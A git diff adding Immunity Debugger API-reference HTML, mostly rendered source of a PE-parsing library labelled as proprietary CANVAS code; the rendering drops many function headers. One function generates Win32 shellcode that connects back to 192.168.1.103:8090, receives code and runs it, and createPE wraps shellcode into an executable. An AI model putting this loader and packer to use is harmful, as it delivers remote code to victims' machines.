+ Parameters:
+ valSTRING) - Shortcut name
+
+
+
+
+
+
+ Print all the current setted GFlags
+
+ Returns: LIST OF TUPLES
+ A list of a tuple with two elements: Shortcut Name and flag
+ information
+
+
+
+
+
+ Clear the Flags
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib-module.html b/1.73/Documentation/Ref/Libs.pelib-module.html
new file mode 100755
index 0000000..a321890
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib-module.html
@@ -0,0 +1,338 @@
+
+
+
+
+ Libs.pelib
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib
+
+
+
+
+
+
+
+
+Module pelib source code
+(c) Immunity, Inc. 2004-2007
+ Immunity Inc.
+ pelib
+ Proprietary CANVAS source code - use only under the license agreement
+ specified in LICENSE.txt in your CANVAS distribution Copyright Immunity,
+ Inc, 2002-2007 http://www.immunityinc.com/CANVAS/ for more
+ information
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ readStringFromFile (fd ,
+ offset )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.0'
+
+
+
+
+
+ IMAGE_SIZEOF_FILE_HEADER = 20
+
+
+
+
+
+
+ MZ_MAGIC = 23117
+
+
+
+
+
+
+ PE_MAGIC = 17744
+
+
+
+
+
+
+ IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
+
+
+
+
+
+
+ IMAGE_ORDINAL_FLAG = 2147483648
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib-pysrc.html b/1.73/Documentation/Ref/Libs.pelib-pysrc.html
new file mode 100755
index 0000000..5a99dce
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib-pysrc.html
@@ -0,0 +1,2113 @@
+
+
+
+
+ Libs.pelib
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib
+
+
+
+
+
+
+
+
+
+ 1
+ 2 """ 3 (c) Immunity, Inc. 2004-2007 4 5 6 U{Immunity Inc.<http://www.immunityinc.com>} pelib 7 8 Proprietary CANVAS source code - use only under the license agreement 9 specified in LICENSE.txt in your CANVAS distribution 10 Copyright Immunity, Inc, 2002-2007 11 http://www.immunityinc.com/CANVAS/ for more information 12 13 """ 14
+ 15 __VERSION__ = '1.0' 16
+ 17 import struct , sys 18 sys . path . append ( "." ) 19 sys . path . append ( "../" ) 20
+ 21
+ 22
+ 23
+ 24
+ 25
+ 26 try : 27 import mosdef
+ 28 except ImportError : 29 pass
+ 30 try : 31 from shellcode import shellcodeGenerator
+ 32 except ImportError : 33 pass
+ 34
+ 35 IMAGE_SIZEOF_FILE_HEADER = 20 36 MZ_MAGIC = 0x5A4D 37 PE_MAGIC = 0x4550 38 IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16 39 IMAGE_ORDINAL_FLAG = 0x80000000L 40
+ 41
+ 42
+ 43
+
45 tbl = [ ]
+
46 tmp = ""
+
47 hex = ""
+
48 i = 0
+
49 for a in buf :
+
50 hex += "%02X " % ord ( a )
+
51 i += 1
+
52 if ord ( a ) >= 0x20 and ord ( a ) < 0x7f :
+
53 tmp += a
+
54 else :
+
55 tmp += "."
+
56 if i % 16 == 0 :
+
57 tbl . append ( ( hex , tmp ) )
+
58 hex = ""
+
59 tmp = ""
+
60 tbl . append ( ( hex , tmp ) )
+
61 return tbl
+
62
+
64 idx = fd . tell ( )
+
65 fd . seek ( offset )
+
66 b = f . read ( 4096 * 4 )
+
67 zero = b . find ( "\0" )
+
68 fd . seek ( idx )
+
69 if zero > - 1 :
+
70 return b [ : zero ]
+
71 return ""
+
72
+ 73
+ 74
+ 75
+ 76
+ 77
+ 78
+ 79
+ 80
+ 81
+ 82
+ 83
+ 84
+ 85
+ 86
+ 87
+ 88
+ 89
+ 90
+ 91
+ 92
+ 93
+ 94
+ 95
+ 97
+
99
+
101 self . fmt = "<30HL"
+
102 self . e_magic = 0x5A4D
+
103 self . e_cblp = self . e_cp = self . e_crlc = self . e_cparhdr = self . e_minalloc = self . e_maxalloc = self . e_ss = self . e_sp = \
+
104 self . e_csum = self . e_ip = self . e_cs = self . e_lfarlc = self . e_ovno = self . e_oemid = \
+
105 self . e_oeminfo = self . e_res2 = self . e_lfanew = 0
+
106
+
107 self . e_res = [ 0 , 0 , 0 , 0 ]
+
108 self . e_res2 = [ 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ]
+
109
+
111 return struct . calcsize ( self . fmt )
+
112
+
113 - def get ( self , data ) :
+
114 try :
+
115 buf = struct . unpack ( self . fmt , data [ : struct . calcsize ( self . fmt ) ] )
+
116 except struct . error :
+
117 raise PEError , "The header doesn't correspond to a MZ header"
+
118
+
119 self . e_magic = buf [ 0 ]
+
120 self . e_cblp = buf [ 1 ]
+
121 self . e_cp = buf [ 2 ]
+
122 self . e_crlc = buf [ 3 ]
+
123 self . e_cparhdr = buf [ 4 ]
+
124 self . e_minalloc = buf [ 5 ]
+
125 self . e_maxalloc = buf [ 6 ]
+
126 self . e_ss = buf [ 7 ]
+
127 self . e_sp = buf [ 8 ]
+
128 self . e_csum = buf [ 9 ]
+
129 self . e_ip = buf [ 10 ]
+
130 self . e_cs = buf [ 11 ]
+
131 self . e_lfarlc = buf [ 12 ]
+
132 self . e_ovno = buf [ 13 ]
+
133 self . e_res = buf [ 14 : 18 ]
+
134 self . e_oemid = buf [ 18 ]
+
135 self . e_oeminfo = buf [ 19 ]
+
136 self . e_res2 = buf [ 20 : 30 ]
+
137 self . e_lfanew = buf [ 30 ]
+
138
+
139 if self . e_magic != MZ_MAGIC :
+
140 raise PEError , "The header doesn't correspond to a MZ header"
+
141
+
143 return struct . pack ( self . fmt , self . e_magic , self . e_cblp , self . e_cp , \
+
144 self . e_crlc , self . e_cparhdr , self . e_minalloc , \
+
145 self . e_maxalloc , self . e_ss , self . e_sp , self . e_csum , \
+
146 self . e_ip , self . e_cs , self . e_lfarlc , self . e_ovno , \
+
147 self . e_res [ 0 ] , self . e_res [ 1 ] , self . e_res [ 2 ] , self . e_res [ 3 ] , \
+
148 self . e_oemid , self . e_oeminfo , \
+
149 self . e_res2 [ 0 ] , self . e_res2 [ 1 ] , self . e_res2 [ 2 ] , self . e_res2 [ 3 ] , \
+
150 self . e_res2 [ 4 ] , self . e_res2 [ 5 ] , self . e_res2 [ 6 ] , self . e_res2 [ 7 ] ,
+
151 self . e_res2 [ 8 ] , self . e_res2 [ 9 ] , self . e_lfanew )
+
152
+
153
+
155 return self . e_lfanew
+
156
+
159 self . fmt = "<H"
+
160 self . Hint = 0
+
161 self . Name = ""
+
162
+
163 - def get ( self , data ) :
+
164 self . Hint = struct . unpack ( self . fmt , data [ : 2 ] ) [ 0 ]
+
165 ndx = data [ 2 : ] . find ( "\0" )
+
166 if ndx == - 1 :
+
167 raise PEError , "No string found on ImageImportByName"
+
168 self . Name = data [ 2 : 2 + ndx ]
+
169
+
171 return len ( self . Name ) + 3
+
172
+
174 return struct . pack ( self . fmt , self . Hint ) + self . Name + "\0"
+
175
+
178 self . fmt = "<LLLLL"
+
179 self . OriginalFirstThunk = self . TimeDateStamp = self . ForwarderChain = self . Name = \
+
180 self . FirstThunk = 0
+
181 self . sName = ""
+
182 self . Imports = { }
+
183
+
184 - def get ( self , data ) :
+
185 ( self . OriginalFirstThunk , self . TimeDateStamp , self . ForwarderChain , self . Name , \
+
186 self . FirstThunk ) = struct . unpack ( self . fmt , data )
+
187
+
190
+
192 self . Imports [ name ] = obj
+
193
+
195 return struct . pack ( self . fmt , self . OriginalFirstThunk , self . TimeDateStamp , self . ForwarderChain , self . Name , \
+
196 self . FirstThunk )
+
197
+
199 return struct . calcsize ( self . fmt )
+
200
+ 201
+ 202
+ 203
+ 204
+ 205
+ 206
+
208
+
210 self . VirtualAddress = self . Size = 0
+
211
+
212 - def get ( self , data ) :
+
213 ( self . VirtualAddress , self . Size ) = struct . unpack ( "2L" , data )
+
214
+
216 return struct . pack ( "2L" , self . VirtualAddress , self . Size )
+
217
+
220
+ 221
+ 222
+ 223
+ 224
+ 225
+ 226
+ 227
+ 228
+ 229
+ 230
+ 231
+ 232
+ 233
+
236 self . fmt = "<2L2H7L"
+
237 self . Characteristics = self . TimeDateStamp = self . MajorVersion = self . MinorVersion = self . Name = self . Base = \
+
238 self . NumberOfFunctions = self . NumberOfNames = self . AddressOfFunctions = self . AddressOfNames = \
+
239 self . AddressOfNameOrdinals = 0
+
240 self . sName = ""
+
241
+
244
+
246 return struct . calcsize ( self . fmt )
+
247
+
248 - def get ( self , data ) :
+
249 ( self . Characteristics , self . TimeDateStamp , self . MajorVersion , self . MinorVersion , self . Name , self . Base , \
+
250 self . NumberOfFunctions , self . NumberOfNames , self . AddressOfFunctions , self . AddressOfNames , \
+
251 self . AddressOfNameOrdinals ) = struct . unpack ( self . fmt , data )
+
252
+
254 return struct . pack ( self . fmt , self . Characteristics , self . TimeDateStamp , self . MajorVersion , self . MinorVersion , self . Name , self . Base , \
+
255 self . NumberOfFunctions , self . NumberOfNames , self . AddressOfFunctions , self . AddressOfNames , \
+
256 self . AddressOfNameOrdinals )
+
257
+ 258
+ 259
+ 260
+ 261
+ 262
+ 263
+ 264
+ 265
+ 266
+ 267
+ 268
+ 269
+ 270
+ 271
+ 272
+ 273
+ 274
+ 275
+ 276
+ 277
+
280 self . fmt = "<LLLLLLHHL"
+
281 self . Name = ""
+
282 self . VirtualSize = self . VirtualAddress = self . SizeOfRawData = self . PointerToRawData = \
+
283 self . PointerToRelocations = self . PointerToLinenumbers = \
+
284 self . NumberOfRelocations = self . NumberOfLinenumbers = \
+
285 self . Characteristics = 0
+
286
+
288 return struct . calcsize ( self . fmt ) + 8
+
289
+
290 - def has ( self , rva , imagebase = 0 ) :
+
291 return rva >= ( self . VirtualAddress + imagebase ) and rva < ( self . VirtualAddress + self . VirtualSize + imagebase )
+
292
+
294 return offset >= self . PointerToRawData and offset < ( self . PointerToRawData + self . VirtualSize )
+
295
+
296
+
297 - def get ( self , data ) :
+
298 idx = 0
+
299
+
300 self . Name = data [ idx : idx + 8 ]
+
301 idx += 8
+
302
+
303 ( self . VirtualSize , self . VirtualAddress , self . SizeOfRawData , self . PointerToRawData , \
+
304 self . PointerToRelocations , self . PointerToLinenumbers , \
+
305 self . NumberOfRelocations , self . NumberOfLinenumbers , \
+
306 self . Characteristics ) = \
+
307 struct . unpack ( self . fmt , data [ idx : ] )
+
308
+
310 self . Name = ( self . Name + "\x00" * ( 8 - len ( self . Name ) ) ) [ : 8 ]
+
311 return self . Name + struct . pack ( self . fmt , self . VirtualSize , \
+
312 self . VirtualAddress , self . SizeOfRawData , self . PointerToRawData , \
+
313 self . PointerToRelocations , self . PointerToLinenumbers , \
+
314 self . NumberOfRelocations , self . NumberOfLinenumbers , \
+
315 self . Characteristics )
+
316
+ 317
+ 318
+ 319
+ 320
+ 321
+ 322
+ 323
+ 324
+ 325
+ 326
+ 327
+ 328
+ 329
+
332 self . imagefmt = "<2H3L2H"
+
333 ( self . Machine , \
+
334 self . NumberOfSections , \
+
335 self . TimeDateStamp , \
+
336 self . PointerToSymbolTable , \
+
337 self . NumberOfSymbols , \
+
338 self . SizeOfOptionalHeader , \
+
339 self . Characteristics ) = ( 0 , 0 , 0 , 0 , 0 , 0xe0 , 0 )
+
340
+
341 - def get ( self , data ) :
+
342 try :
+
343 ( self . Machine , \
+
344 self . NumberOfSections , \
+
345 self . TimeDateStamp , \
+
346 self . PointerToSymbolTable , \
+
347 self . NumberOfSymbols , \
+
348 self . SizeOfOptionalHeader , \
+
349 self . Characteristics ) = struct . unpack ( self . imagefmt , data )
+
350 except struct . error :
+
351 raise PEError , "Invalid IMAGE header" % self . signature
+
352
+
354 return struct . calcsize ( self . imagefmt )
+
355
+
357 try :
+
358 return struct . pack ( self . imagefmt , self . Machine , \
+
359 self . NumberOfSections , \
+
360 self . TimeDateStamp , \
+
361 self . PointerToSymbolTable , \
+
362 self . NumberOfSymbols , \
+
363 self . SizeOfOptionalHeader , \
+
364 self . Characteristics )
+
365 except struct . error :
+
366 raise PEError , "Image not initialized" % self . signature
+
367
+ 368
+ 369
+ 370
+ 371
+ 372
+ 373
+ 374
+ 375
+ 376
+ 377
+ 378
+ 379
+ 380
+ 381
+ 382
+ 383
+ 384
+ 385
+ 386
+ 387
+ 388
+ 389
+ 390
+ 391
+ 392
+ 393
+ 394
+ 395
+ 396
+ 397
+ 398
+ 399
+ 400
+ 401
+ 402
+ 403
+ 404
+ 405
+ 406
+ 407
+ 408
+
411 self . optionalfmt = "<HBB9L6H4L2H6L"
+
412 self . Magic = 0x010b
+
413 self . MajorLinkerVersion = self . MinorLinkerVersion = self . SizeOfCode = \
+
414 self . SizeOfInitializedData = self . SizeOfUninitializedData = self . AddressOfEntryPoint = \
+
415 self . BaseOfCode = self . BaseOfData = self . ImageBase = self . SectionAlignment = self . FileAlignment = \
+
416 self . MajorOperatingSystemVersion = self . MinorOperatingSystemVersion = self . MajorImageVersion = \
+
417 self . MinorImageVersion = self . MajorSubsystemVersion = self . MinorSubsystemVersion = \
+
418 self . Reserved1 = self . SizeOfImage = self . SizeOfHeaders = self . CheckSum = self . Subsystem = \
+
419 self . DllCharacteristics = self . SizeOfStackReserve = self . SizeOfStackCommit = self . SizeOfHeapReserve = \
+
420 self . SizeOfHeapCommit = self . LoaderFlags = self . NumberOfRvaAndSizes = 0
+
421
+
423 return struct . calcsize ( self . optionalfmt )
+
424
+
426 return "self.Magic %08x,\
+
427 self.MajorLinkerVersion %08x,\
+
428 self.MinorLinkerVersion %08x,\
+
429 self.SizeOfCode %08x,\
+
430 self.SizeOfInitializedData %08x,\
+
431 self.SizeOfUninitializedData %08x,\
+
432 self.AddressOfEntryPoint %08x,\
+
433 self.BaseOfCode %08x,\
+
434 self.BaseOfData %08x,\
+
435 self.ImageBase %08x,\
+
436 self.SectionAlignment %08x,\
+
437 self.FileAlignment %08x,\
+
438 self.MajorOperatingSystemVersion %08x,\
+
439 self.MinorOperatingSystemVersion %08x,\
+
440 self.MajorImageVersion %08x,\
+
441 self.MinorImageVersion %08x,\
+
442 self.MajorSubsystemVersion %08x,\
+
443 self.MinorSubsystemVersion %08x,\
+
444 self.Reserved1 %08x,\
+
445 self.SizeOfImage %08x,\
+
446 self.SizeOfHeaders %08x,\
+
447 self.CheckSum %08x,\
+
448 self.Subsystem %08x,\
+
449 self.DllCharacteristics %08x,\
+
450 self.SizeOfStackReserve %08x,\
+
451 self.SizeOfStackCommit %08x,\
+
452 self.SizeOfHeapReserve %08x,\
+
453 self.SizeOfHeapCommit %08x,\
+
454 self.LoaderFlags %08x,\
+
455 self.NumberOfRvaAndSizes %08x" % \
+
456 ( self . Magic , \
+
457 self . MajorLinkerVersion , \
+
458 self . MinorLinkerVersion , \
+
459 self . SizeOfCode , \
+
460 self . SizeOfInitializedData , \
+
461 self . SizeOfUninitializedData , \
+
462 self . AddressOfEntryPoint , \
+
463 self . BaseOfCode , \
+
464 self . BaseOfData , \
+
465 self . ImageBase , \
+
466 self . SectionAlignment , \
+
467 self . FileAlignment , \
+
468 self . MajorOperatingSystemVersion , \
+
469 self . MinorOperatingSystemVersion , \
+
470 self . MajorImageVersion , \
+
471 self . MinorImageVersion , \
+
472 self . MajorSubsystemVersion , \
+
473 self . MinorSubsystemVersion , \
+
474 self . Reserved1 , \
+
475 self . SizeOfImage , \
+
476 self . SizeOfHeaders , \
+
477 self . CheckSum , \
+
478 self . Subsystem , \
+
479 self . DllCharacteristics , \
+
480 self . SizeOfStackReserve , \
+
481 self . SizeOfStackCommit , \
+
482 self . SizeOfHeapReserve , \
+
483 self . SizeOfHeapCommit , \
+
484 self . LoaderFlags , \
+
485 self . NumberOfRvaAndSizes )
+
486
+
487 - def get ( self , data ) :
+
488 try :
+
489 ( self . Magic , \
+
490 self . MajorLinkerVersion , \
+
491 self . MinorLinkerVersion , \
+
492 self . SizeOfCode , \
+
493 self . SizeOfInitializedData , \
+
494 self . SizeOfUninitializedData , \
+
495 self . AddressOfEntryPoint , \
+
496 self . BaseOfCode , \
+
497 self . BaseOfData , \
+
498 self . ImageBase , \
+
499 self . SectionAlignment , \
+
500 self . FileAlignment , \
+
501 self . MajorOperatingSystemVersion , \
+
502 self . MinorOperatingSystemVersion , \
+
503 self . MajorImageVersion , \
+
504 self . MinorImageVersion , \
+
505 self . MajorSubsystemVersion , \
+
506 self . MinorSubsystemVersion , \
+
507 self . Reserved1 , \
+
508 self . SizeOfImage , \
+
509 self . SizeOfHeaders , \
+
510 self . CheckSum , \
+
511 self . Subsystem , \
+
512 self . DllCharacteristics , \
+
513 self . SizeOfStackReserve , \
+
514 self . SizeOfStackCommit , \
+
515 self . SizeOfHeapReserve , \
+
516 self . SizeOfHeapCommit , \
+
517 self . LoaderFlags , \
+
518 self . NumberOfRvaAndSizes ) = struct . unpack ( self . optionalfmt , data )
+
519 except struct . error :
+
520 raise PEError , "Invalid Optional Header" % self . signature
+
521
+
523 try :
+
524 return struct . pack ( self . optionalfmt , self . Magic , \
+
525 self . MajorLinkerVersion , \
+
526 self . MinorLinkerVersion , \
+
527 self . SizeOfCode , \
+
528 self . SizeOfInitializedData , \
+
529 self . SizeOfUninitializedData , \
+
530 self . AddressOfEntryPoint , \
+
531 self . BaseOfCode , \
+
532 self . BaseOfData , \
+
533 self . ImageBase , \
+
534 self . SectionAlignment , \
+
535 self . FileAlignment , \
+
536 self . MajorOperatingSystemVersion , \
+
537 self . MinorOperatingSystemVersion , \
+
538 self . MajorImageVersion , \
+
539 self . MinorImageVersion , \
+
540 self . MajorSubsystemVersion , \
+
541 self . MinorSubsystemVersion , \
+
542 self . Reserved1 , \
+
543 self . SizeOfImage , \
+
544 self . SizeOfHeaders , \
+
545 self . CheckSum , \
+
546 self . Subsystem , \
+
547 self . DllCharacteristics , \
+
548 self . SizeOfStackReserve , \
+
549 self . SizeOfStackCommit , \
+
550 self . SizeOfHeapReserve , \
+
551 self . SizeOfHeapCommit , \
+
552 self . LoaderFlags , \
+
553 self . NumberOfRvaAndSizes )
+
554
+
555 except struct . error :
+
556 raise PEError , "Invalid Optional Header" % self . signature
+
557
+
560
+
561 self . Directories = [ ]
+
562 self . Sections = { }
+
563 self . Imports = { }
+
564
+
565 - def get ( self , data , offset2PE ) :
+
600
+
601
+
602
+
603
+
604
+
605
+
606
+
607
+
609 idx = 0
+
610 for a in range ( 0 , self . IMGhdr . NumberOfSections ) :
+
611 sec = Section ( )
+
612 sec . get ( data [ idx : idx + sec . getSize ( ) ] )
+
613 idx += sec . getSize ( )
+
614 self . Sections [ sec . Name ] = sec
+
615
+
616 return idx + sec . getSize ( )
+
617
+
619 offset = self . getOffsetFromRVA ( rva )
+
620 if not offset :
+
621 print "No Import Table Found"
+
622 return ""
+
623 while 1 :
+
624 im = ImportDescriptor ( )
+
625
+
626 im . get ( data [ offset : offset + im . getSize ( ) ] )
+
627 if im . OriginalFirstThunk == 0 :
+
628 break
+
629 im . setSname ( self . getString ( data , im . Name ) )
+
630 if not im . sName :
+
631 raise PEError , "No String found on Import at offset: 0x%08x" % offset
+
632 self . Imports [ im . sName ] = im
+
633
+
634 funcNdx = self . getOffsetFromRVA ( im . OriginalFirstThunk )
+
635 while 1 :
+
636 rva2IIBN = struct . unpack ( "L" , data [ funcNdx : funcNdx + 4 ] ) [ 0 ]
+
637 funcNdx += 4
+
638 if rva2IIBN == 0 :
+
639 break
+
640 iibn = ImageImportByName ( )
+
641 if rva2IIBN & IMAGE_ORDINAL_FLAG :
+
642 im . setImport ( "#" + str ( rva2IIBN & ~ ( IMAGE_ORDINAL_FLAG ) ) \
+
643 , iibn )
+
644 else :
+
645 off2IIBN = self . getOffsetFromRVA ( rva2IIBN )
+
646
+
647 iibn = ImageImportByName ( )
+
648 iibn . get ( data [ off2IIBN : ] )
+
649 im . setImport ( iibn . Name , iibn )
+
650
+
651 offset += im . getSize ( )
+
652
+
654 for a in self . Imports . keys ( ) :
+
655 im = self . Imports [ a ]
+
656
+
657 for b in im . Imports . keys ( ) :
+
658 print a , ":" , b
+
659
+
661 print "Name VirtulAddress PointerToRawData"
+
662 for a in self . Sections . keys ( ) :
+
663 print a , hex ( self . Sections [ a ] . VirtualAddress ) , hex ( self . Sections [ a ] . PointerToRawData ) , hex ( self . Sections [ a ] . SizeOfRawData )
+
664
+
665
+
667 offset = self . getOffsetFromRVA ( rva )
+
668 end = data [ offset : ] . find ( "\0" )
+
669 if end == - 1 :
+
670 return ""
+
671 return data [ offset : offset + end ]
+
672
+
674 sec = None
+
675 for a in self . Sections . keys ( ) :
+
676 if self . Sections [ a ] . has ( rva , imagebase ) :
+
677 sec = self . Sections [ a ]
+
678 if sec :
+
679 return ( rva - sec . VirtualAddress - imagebase ) + sec . PointerToRawData
+
680 return ""
+
681
+
683 sec = None
+
684 for a in self . Sections . keys ( ) :
+
685 if self . Sections [ a ] . hasOffset ( offset ) :
+
686 sec = self . Sections [ a ]
+
687 if sec :
+
688 return ( offset - sec . PointerToRawData ) + sec . VirtualAddress + imagebase
+
689 return ""
+
690
+
697
+
699 for a in self . Directories :
+
700 print "%08x %08x " % ( a . VirtualAddress , a . Size )
+
701
+
703 offset = self . getOffsetFromRVA ( rva )
+
704 if not offset :
+
705
+
706 return ""
+
707 em = ImageExportDirectory ( )
+
708 em . get ( data [ offset : offset + em . getSize ( ) ] )
+
709 em . setName ( self . getString ( data , em . Name ) )
+
710 addrofnames = self . getOffsetFromRVA ( em . AddressOfNames )
+
711 addroforidnal = self . getOffsetFromRVA ( em . AddressOfNameOrdinals )
+
712 eat = self . getOffsetFromRVA ( em . AddressOfFunctions )
+
713
+
714 for a in range ( 0 , em . NumberOfNames ) :
+
715 nameaddr = struct . unpack ( "L" , data [ addrofnames : addrofnames + 4 ] ) [ 0 ]
+
716 ordinal = struct . unpack ( "H" , data [ addroforidnal : addroforidnal + 2 ] ) [ 0 ]
+
717 address = struct . unpack ( "L" , data [ eat + ordinal * 4 : eat + ordinal * 4 + 4 ] ) [ 0 ]
+
718
+
719 try :
+
720 name = self . getString ( data , nameaddr )
+
721 except TypeError , msg :
+
722 print "Error on Export Table %s" % str ( msg )
+
723 break
+
724 print "0x%08x (0x%08x): %s" % ( self . IMGOPThdr . ImageBase + address , address , name )
+
725 addrofnames += 4
+
726 addroforidnal += 2
+
727
+ 728
+ 729
+ 730
+ 731
+ 732
+ 733
+ 734
+ 735
+ 736
+ 737
+
741
+
743 self . rawdata = data
+
744 self . _openPE ( )
+
745
+
747 self . fd = open ( filename , "rb" )
+
748 self . filename = filename
+
749 self . rawdata = self . fd . read ( )
+
750
+
751
+
752 self . _openPE ( )
+
753
+
754
+
756
+
757 localhost = "192.168.1.103"
+
758 localport = 8090
+
759
+
760 sc = shellcodeGenerator . win32 ( )
+
761 sc . addAttr ( "findeipnoesp" , { "subespval" : 0x1000 } )
+
762 sc . addAttr ( "revert_to_self_before_importing_ws2_32" , None )
+
763 sc . addAttr ( "tcpconnect" , { "port" : localport , "ipaddress" : localhost } )
+
764 sc . addAttr ( "RecvExecWin32" , { "socketreg" : "FDSPOT" } )
+
765 sc . addAttr ( "ExitThread" , None )
+
766 injectme = sc . get ( )
+
767
+
768 sc = shellcodeGenerator . win32 ( )
+
769 sc . addAttr ( "findeipnoesp" , { "subespval" : 0 } )
+
770 sc . addAttr ( "InjectToSelf" , { "injectme" : injectme } )
+
771 sc . addAttr ( "ExitThread" , None )
+
772 return sc . get ( )
+
773
+
774 - def align ( self , idx , aligment ) :
+
775 return ( idx + aligment ) & ~ ( aligment - 1 )
+
776
+
783
+
784 - def createPE ( self , filename , shellcode , importante = [ ( "advapi32.dll" , [ "RevertToSelf" ] ) ] ) :
+
785
+
786 buf = self . createPEFileBuf ( shellcode , importante )
+
787
+
788 f = open ( filename , "wb" )
+
789 f . write ( buf )
+
790 f . close ( )
+
791
+
792
+
793 - def createPEFileBuf ( self , shellcode , importante = [ ( "advapi32.dll" , [ "RevertToSelf" ] ) ] ) :
+
794
+
795 idx = 0
+
796
+
797 mz = MZ ( )
+
798 mz . e_lfanew = mz . getSize ( )
+
799
+
800 idx += mz . getSize ( )
+
801
+
802
+
803 imgHdr = IMGhdr ( )
+
804 imgHdr . Machine = 0x014c
+
805 imgHdr . NumberOfSections = 0x2
+
806 imgHdr . Characteristics = 0x0102
+
807
+
808 idx += imgHdr . getSize ( ) + 4
+
809
+
810
+
811 imgOpt = IMGOPThdr ( )
+
812 imgOpt . SectionAlignment = 0x20
+
813 imgOpt . FileAlignment = 0x20
+
814 imgOpt . MajorOperatingSystemVersion = 0x4
+
815 imgOpt . MajorSubsystemVersion = 0x4
+
816 imgOpt . Subsystem = 0x3
+
817 imgOpt . SizeOfStackReserve = 0x100000
+
818 imgOpt . SizeOfStackCommit = 0x1000
+
819 imgOpt . SizeOfHeapReserve = 0x100000
+
820 imgOpt . SizeOfHeapCommit = 0x1000
+
821 imgOpt . NumberOfRvaAndSizes = 0x10
+
822
+
823 idx += imgOpt . getSize ( )
+
824
+
825
+
826 directories = [ ]
+
827 for a in range ( 0 , imgOpt . NumberOfRvaAndSizes ) :
+
828 directories . append ( Directory ( ) )
+
829
+
830 idx += directories [ 0 ] . getSize ( ) * 16
+
831
+
832
+
833 code = Section ( )
+
834 code . Name = ".text"
+
835 code . Characteristics = 0x60000020L
+
836 idx += code . getSize ( )
+
837
+
838
+
839 data = Section ( )
+
840 data . Name = ".data"
+
841 data . Characteristics = 0xc0000040L
+
842
+
843 idx += data . getSize ( )
+
844
+
845 code_offset = self . align ( idx , imgOpt . FileAlignment )
+
846 firstpad = "\0" * ( code_offset - idx )
+
847 idx = code_offset
+
848
+
849
+
850 idx += len ( shellcode )
+
851 data_offset = self . align ( idx , imgOpt . FileAlignment )
+
852 secondpad = "\0" * ( data_offset - idx )
+
853 idx = data_offset
+
854 data_buf = ""
+
855 idx += len ( data_buf )
+
856
+
857
+
858 import_offset = idx
+
859 imports = [ ]
+
860 ndx = 0
+
861 import_str = ""
+
862
+
863 for a in importante :
+
864 i = ImportDescriptor ( )
+
865 i . ForwarderChain = 0xFFFFFFFFL
+
866 imports . append ( ( i , ndx ) )
+
867
+
868 ndx += len ( a [ 0 ] + "\0" )
+
869
+
870
+
871 import_str += a [ 0 ] + "\0"
+
872
+
873
+
874 imports . append ( ( ImportDescriptor ( ) , 0 ) )
+
875 idx += i . getSize ( ) * len ( imports )
+
876
+
877 import_str_offset = idx
+
878 idx += len ( import_str )
+
879
+
880 off = self . align ( idx , imgOpt . FileAlignment )
+
881 import_str += "\0" * ( off - idx )
+
882 idx = off
+
883
+
884
+
885 original_thunks_offset = idx
+
886 original_thunk = [ ]
+
887 for a in importante :
+
888 original_thunk . append ( idx )
+
889 idx += len ( a [ 1 ] ) * 4 + 4
+
890
+
891
+
892 first_thunks_offset = idx
+
893 first_thunk = [ ]
+
894 for a in importante :
+
895 first_thunk . append ( idx )
+
896 idx += len ( a [ 1 ] ) * 4 + 4
+
897
+
898
+
899 IIBN = [ ]
+
900 for a in importante :
+
901 tbl = [ ]
+
902 IIBN . append ( tbl )
+
903 for b in a [ 1 ] :
+
904 iibn = ImageImportByName ( )
+
905 iibn . Name = b
+
906 iibn . Hint = 1
+
907 tbl . append ( ( iibn , idx ) )
+
908 idx += iibn . getSize ( )
+
909
+
910 endpad = "\0" * ( self . align ( idx , imgOpt . FileAlignment ) - idx )
+
911
+
912
+
913 imgOpt . SizeOfCode = len ( shellcode ) + len ( secondpad )
+
914 imgOpt . BaseOfCode = imgOpt . AddressOfEntryPoint = code_offset
+
915 imgOpt . BaseOfData = data_offset
+
916 imgOpt . ImageBase = 0x40000
+
917 imgOpt . SizeOfInitializedData = 0x20
+
918 imgOpt . SizeOfImage = 0xc
+
919
+
920 imgOpt . SizeOfHeaders = code_offset
+
921 imgOpt . NumberOfRvaAndSizes = 0x10
+
922
+
923
+
924
+
925 directories [ 1 ] . VirtualSize = directories [ 1 ] . Size = idx - import_offset
+
926 directories [ 1 ] . VirtualAddress = import_offset
+
927
+
928
+
929 code . VirtualAddress = code_offset
+
930 code . VirtualSize = code . SizeOfRawData = imgOpt . SizeOfCode
+
931 code . PointerToRawData = code_offset
+
932
+
933 data . VirtualAddress = data_offset
+
934 data . VirtualSize = data . SizeOfRawData = idx - data_offset
+
935 data . PointerToRawData = data_offset
+
936
+
937 imgOpt . SizeOfImage = idx
+
938
+
939
+
940 for a in range ( 0 , len ( imports ) - 1 ) :
+
941 imports [ a ] [ 0 ] . OriginalFirstThunk = original_thunk [ a ]
+
942 imports [ a ] [ 0 ] . FirstThunk = first_thunk [ a ]
+
943 imports [ a ] [ 0 ] . Name = import_str_offset + imports [ a ] [ 1 ]
+
944
+
945
+
946
+
947 buf = mz . raw ( ) + struct . pack ( "L" , PE_MAGIC ) + imgHdr . raw ( ) + imgOpt . raw ( )
+
948 for a in directories :
+
949 buf += a . raw ( )
+
950 buf += code . raw ( )
+
951 buf += data . raw ( )
+
952 buf += firstpad
+
953 buf += shellcode
+
954 buf += secondpad
+
955 buf += data_buf
+
956
+
957 for a in imports :
+
958 buf += a [ 0 ] . raw ( )
+
959 buf += import_str
+
960
+
961
+
